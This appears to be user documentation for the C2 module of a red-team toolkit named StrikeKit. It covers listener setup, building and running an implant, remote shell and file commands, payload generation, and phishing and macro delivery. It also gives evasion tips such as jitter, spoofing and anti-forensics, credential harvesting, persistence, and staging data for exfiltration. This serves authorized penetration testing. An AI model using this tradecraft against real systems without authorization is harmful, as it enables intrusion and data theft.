Command and Control (C2)

Quick Start

1. Start a Listener

1. Navigate to Toolkit → C2
2. Go to the Listeners tab
3. Configure listener settings:
   • Host: IP address to bind (default: 0.0.0.0)
   • Port: TCP port (default: 8443)
   • Sleep: Agent beacon interval in seconds (default: 5)
   • Jitter: Random delay percentage (default: 10%)
4. Click Start Listener

The listener begins accepting agent connections.

2. Deploy an Agent

Build the Agent

# Build for current platform
cargo build -p sk-agent --release

# Cross-compile for Windows
cargo build -p sk-agent --release --target x86_64-pc-windows-gnu

# Cross-compile for Linux
cargo build -p sk-agent --release --target x86_64-unknown-linux-gnu

Binary location: target/release/sk-agent (or target/<target>/release/sk-agent.exe)

Run the Agent

# Connect to default listener (localhost:8443)
./sk-agent

# Connect to specific C2 server
./sk-agent --server http://192.168.1.100:8443

# With custom sleep interval (30 seconds)
./sk-agent --server http://192.168.1.100:8443 --sleep 30

# With jitter (20% random delay)
./sk-agent --server http://192.168.1.100:8443 --jitter 20

3. Interact with Agent

1. In the Agents tab, you'll see the connected agent
2. Click on the agent to open the command interface
3. Issue commands (see Supported Commands)
4. View command output in real-time

Listener Management

Listener Configuration

Host (Bind Address):

• 0.0.0.0 - Bind to all interfaces (recommended)
• 127.0.0.1 - Local testing only
• Specific IP - Bind to particular interface

Port:

• Default: 8443 (HTTPS)
• Requires firewall rules for external access
• Consider using common ports (80, 443) for blending

Sleep Interval:

• Time in seconds between agent check-ins
• Lower = more responsive, higher network traffic
• Higher = stealth, lower network traffic
• Typical range: 5-60 seconds

Jitter:

• Random delay percentage (0-100%)
• Prevents predictable beacon patterns
• 10-20% is typical for stealth
• 0% for debugging (consistent timing)

Starting and Stopping

Start: Click Start Listener button

• Listener binds to configured port
• Accepts agent connections
• Shows "Running" status

Stop: Click Stop Listener button

• Stops accepting new connections
• Existing agent sessions remain active
• Shows "Stopped" status

Listener Status

Listener displays:

• Current bind address and port
• Number of active agents
• Total data transferred
• Uptime

Agent Management

Agent Tab

The Agents tab shows all connected agents:

Agent Information:

• ID: Unique agent identifier
• Hostname: Target system hostname
• IP Address: Agent's IP
• OS: Operating system and version
• User: Current user context
• Status: Active, Idle, Disconnected
• Last Seen: Time of last check-in

Agent Status

• Active: Recently checked in, ready for tasking
• Idle: No activity, waiting for commands
• Disconnected: Missed multiple check-ins (considered dead)

Agent Actions

Select Agent: Click to open command interface

Task Agent: Send commands via command input

Kill Agent: Gracefully terminate agent (sends exit command)

Remove: Remove from agent list (disconnected agents only)

Supported Commands

System Commands

sysinfo

Get system information:

CPU: Intel Core i7
RAM: 16GB
OS: Windows 10 Pro
Hostname: DESKTOP-ABC123
User: john.doe

pwd

Print current working directory:

C:\Users\john.doe\Documents

cd <path>

Change working directory:

cd C:\Windows\System32

ls [path]

List directory contents:

ls
ls C:\Users

ps

List running processes:

PID    Name                CPU%    Memory
1234   chrome.exe          15.2    512MB
5678   explorer.exe        2.1     128MB

Command Execution

shell <command>

Execute shell command:

shell whoami
shell ipconfig
shell net user

Output is returned and displayed in the interface.

Auto-extraction: StrikeKit automatically extracts:

• IP addresses → Targets
• Credentials (in common formats) → Credentials
• Hostnames → Targets

File Operations

upload <local_path>

Upload file to agent:

upload /path/to/local/file.txt

File is transferred and saved to agent's current directory.

download <remote_path>

Download file from agent:

download C:\Users\john\important.docx

File is transferred and saved to Analysis → Evidence.

Reconnaissance

screenshot

Capture screenshot:

screenshot

Screenshot is transferred and saved to Analysis → Evidence.

Agent Control

sleep <seconds>

Change beacon interval:

sleep 30

Agent updates its check-in frequency.

exit

Gracefully terminate agent:

exit

Agent performs cleanup and exits.

Payload Generation

Payloads Tab

Generate custom payloads with embedded C2 configuration:

1. Go to Payloads tab
2. Configure payload options:
   • Target OS: Windows, Linux, macOS
   • C2 Server: IP and port
   • Sleep: Default beacon interval
   • Jitter: Default jitter percentage
   • Format: Executable, PowerShell, Bash script
3. Click Generate

Payload includes:

• Compiled agent binary
• Embedded C2 configuration
• Optional obfuscation

Delivery Methods

Direct execution:

• Copy to target system
• Execute directly

Web delivery:

• Host on web server
• Target downloads and executes

Script-based (PowerShell/Bash):

• Execute via command line
• In-memory execution (no disk artifacts)

Social engineering:

• Embed in documents (macros)
• Phishing email attachment

Auto-Extraction

StrikeKit automatically extracts useful information from C2 command output:

Targets

Automatically extracted from:

• ipconfig / ifconfig output
• nslookup / dig output
• net view output
• arp -a output

New targets are added to Intelligence → Targets.

Credentials

Automatically extracted from:

• net user output
• cat /etc/shadow output
• Mimikatz output
• LaZagne output
• Configuration files

New credentials are added to Analysis → Credentials.

Evidence

Automatically saved:

• Command output (if significant)
• Downloaded files
• Screenshots
• Process lists

Saved to Analysis → Evidence with agent ID and timestamp.

Integrations (Coming Soon)

Future support for external C2 frameworks:

Sliver

• Import Sliver sessions into StrikeKit
• Unified agent management
• Evidence auto-extraction

Mythic

• Mythic agent management
• Payload generation
• Task tracking

Covenant

• Import .NET agents
• Task output extraction
• Integrated reporting

Security Considerations

Operational Security

1. Use HTTPS: Enable TLS for listener (configure certificates)
2. Change default port: Avoid common C2 ports
3. Jitter: Always use jitter to avoid pattern detection
4. Sleep intervals: Balance responsiveness with stealth
5. Egress filtering: Test allowed outbound ports before deployment

Agent Security

1. Credential protection: Agents don't store credentials on disk
2. Process injection: Use in-memory techniques when possible
3. Anti-forensics: Minimal disk artifacts
4. Cleanup: Use exit command for graceful termination

Network Security

1. Domain fronting: Use CDN fronting (future feature)
2. User-Agent spoofing: Blend with legitimate traffic
3. Protocol mimicry: HTTPS looks like normal web traffic
4. IP rotation: Consider multiple listeners on different IPs

Troubleshooting

Agent Won't Connect

1. Check listener status: Verify listener is running
2. Verify network connectivity: Test port with telnet or nc
3. Check firewall: Ensure port is open
4. Verify server address: Agent must use correct IP/hostname
5. Check logs: Review agent and listener logs for errors

Agent Disconnected

1. Check last seen time: Agent may have crashed
2. Verify network: Network connectivity lost?
3. Check sleep interval: Very high sleep = infrequent check-ins
4. Review agent logs: Was agent terminated?

Command Not Executing

1. Check agent status: Is agent active?
2. Verify command syntax: Review supported commands
3. Check permissions: Does agent user have required privileges?
4. Review output: Look for error messages

Best Practices

Agent Management

1. Name agents: Use descriptive names (hostname-username-date)
2. Document targets: Link agents to targets in Intelligence → Targets
3. Track activities: Create activities for significant C2 operations
4. Evidence collection: Save important command output

Operational Workflow

1. Test locally first: Verify agent and listener work before deployment
2. Start with high sleep: Use 30-60 seconds initially, reduce as needed
3. Monitor agent health: Check last seen times regularly
4. Graceful shutdown: Use exit command instead of killing processes

Reporting

1. Document commands: Save significant command output as evidence
2. Link to findings: Reference C2 evidence in finding documentation
3. Timeline updates: Add C2 milestones to timeline
4. Kill chain tracking: Tag C2 activities appropriately

Tips

1. Multiple listeners: Run listeners on different ports for redundancy
2. Agent persistence: Use upload to deploy persistence mechanisms
3. Lateral movement: Use C2 for internal pivoting
4. Data staging: Stage sensitive data before exfiltration
5. Cleanup tracking: Keep notes on what needs cleanup before engagement end

Related Features

• Targets - Auto-populated from C2 reconnaissance
• Credentials - Auto-extracted from C2 output
• Evidence - C2 artifacts and screenshots
• Kill Chain - Track C2 activities in attack progression

Next Steps

After setting up C2:

1. Deploy Agents - Get agents on target systems
2. Collect Credentials - Store discovered credentials
3. Gather Evidence - Save command output and screenshots
4. Track in Kill Chain - Monitor attack progression
5. Document Findings - Record vulnerabilities discovered via C2

Related Documentation:

• Targets - Auto-populated from C2 recon
• Timeline - C2 activities in chronological order
• Workflow Guide - C2 in engagement lifecycle

Video Tutorial

📹 Coming Soon: Complete C2 setup and agent deployment walkthrough

Quick Demos

🎬 GIF: Starting a listener (10 seconds) 🎬 GIF: Deploying an agent (15 seconds) 🎬 GIF: Executing commands (20 seconds)